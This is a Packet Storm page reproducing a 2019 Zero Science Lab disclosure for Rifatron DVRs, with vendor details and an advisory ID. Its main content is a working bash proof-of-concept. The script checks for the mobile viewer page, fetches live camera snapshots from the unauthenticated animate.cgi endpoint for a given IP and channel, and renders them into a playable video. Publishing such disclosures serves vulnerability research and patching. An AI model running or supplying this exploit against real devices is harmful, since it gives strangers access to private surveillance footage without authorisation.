what you don't know can hurt you

Rifatron Intelligent Digital Security System (animate.cgi) Stream Disclosure

Rifatron Intelligent Digital Security System (animate.cgi) Stream Disclosure
Posted Sep 9, 2019
Authored by LiquidWorm | Site zeroscience.mk

The Rifatron Intelligent Digital Security System DVR suffers from an unauthenticated and unauthorized live stream disclosure when animate.cgi script is called through Mobile Web Viewer module.

tags | exploit, web, cgi
MD5 | 3b87e27dbb257291ff6eeadfd9dc0201

Rifatron Intelligent Digital Security System (animate.cgi) Stream Disclosure

Change Mirror Download
#!/bin/bash
#
#
# Rifatron Intelligent Digital Security System (animate.cgi) Stream Disclosure
#
#
# Vendor: Rifatron Co., Ltd. | SAM MYUNG Co., Ltd.
# Product web page: http://www.rifatron.com
# Affected version: 5brid DVR (HD6-532/516, DX6-516/508/504, MX6-516/508/504, EH6-504)
# 7brid DVR (HD3-16V2, DX3-16V2/08V2/04V2, MX3-08V2/04V2)
# Firmware: <=8.0 (000143)
#
#
# Summary: Rifatron with its roots in Seoul, Korea has been supplying and
# servicing the security market as a leading CCTV/video surveillance security
# system manufacturer, specializing in stand-alone digital video recorder since
# 1998. We are known for marking the first standalone DVR with audio detection
# and 480 frames per secone(fps) and have been focusing on highend products and
# large projects in a variety applications and merket. These include government
# and public services, banking and finance, hotels and entertatinment, retail
# education, industrial and commercial sectors throughout Europe, Middle East,
# the U.S. and Asia. Based on the accumulated know-how in the security industry,
# Rifatron is trying its utmost for the technology development and customer
# satisfaction to be the best security solution company in the world.
#
# Desc: The DVR suffers from an unauthenticated and unauthorized live stream
# disclosure when animate.cgi script is called through Mobile Web Viewer module.
#
# Tested on: Embedded Linux
# Boa/0.94.14rc21
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2019-5532
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5532.php
#
#
# 03.09.2019
#

#{PoC}
#
set -euo pipefail
IFS=$'\n\t'
if [ "$#" -ne 2 ]; then
echo "Usage: $0 IP:PORT CHANNEL" # Valid channel integers: 0-15
echo "Ex.: $0 10.9.8.7:65432 10"
exit
fi
IP=$1
CHANNEL=$2
HOST="http://$IP/cgi-bin/animate.cgi?$CHANNEL"
STATUS=$(curl -Is http://$IP/mobile_viewer_login.html 2>/dev/null | head -1 | awk -F" " '{print $2}')
if [ "$STATUS" == "404" ]; then
echo "Target not vulnerable!"
exit
fi
echo "Collecting snapshots..."
for x in {1..10};
do echo -ne $x
curl "$HOST" -o sequence-$x.jpg -#;
sleep 0.6
done
echo -ne "\nDone."
echo -ne "\nRendering video..."
ffmpeg -t 10 -v quiet -s 352x288 -r 1 -an -i sequence-%01d.jpg -c:v libx264 -vf fps=10 -pix_fmt yuvj422p video.mp4
echo " done."
echo -ne "\nRunning animation..."
sleep 1
cvlc video.mp4 --verbose -1 -f vlc://quit
#
#{/PoC}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    19 Files
  • 16
    Oct 16th
    25 Files
  • 17
    Oct 17th
    17 Files
  • 18
    Oct 18th
    3 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close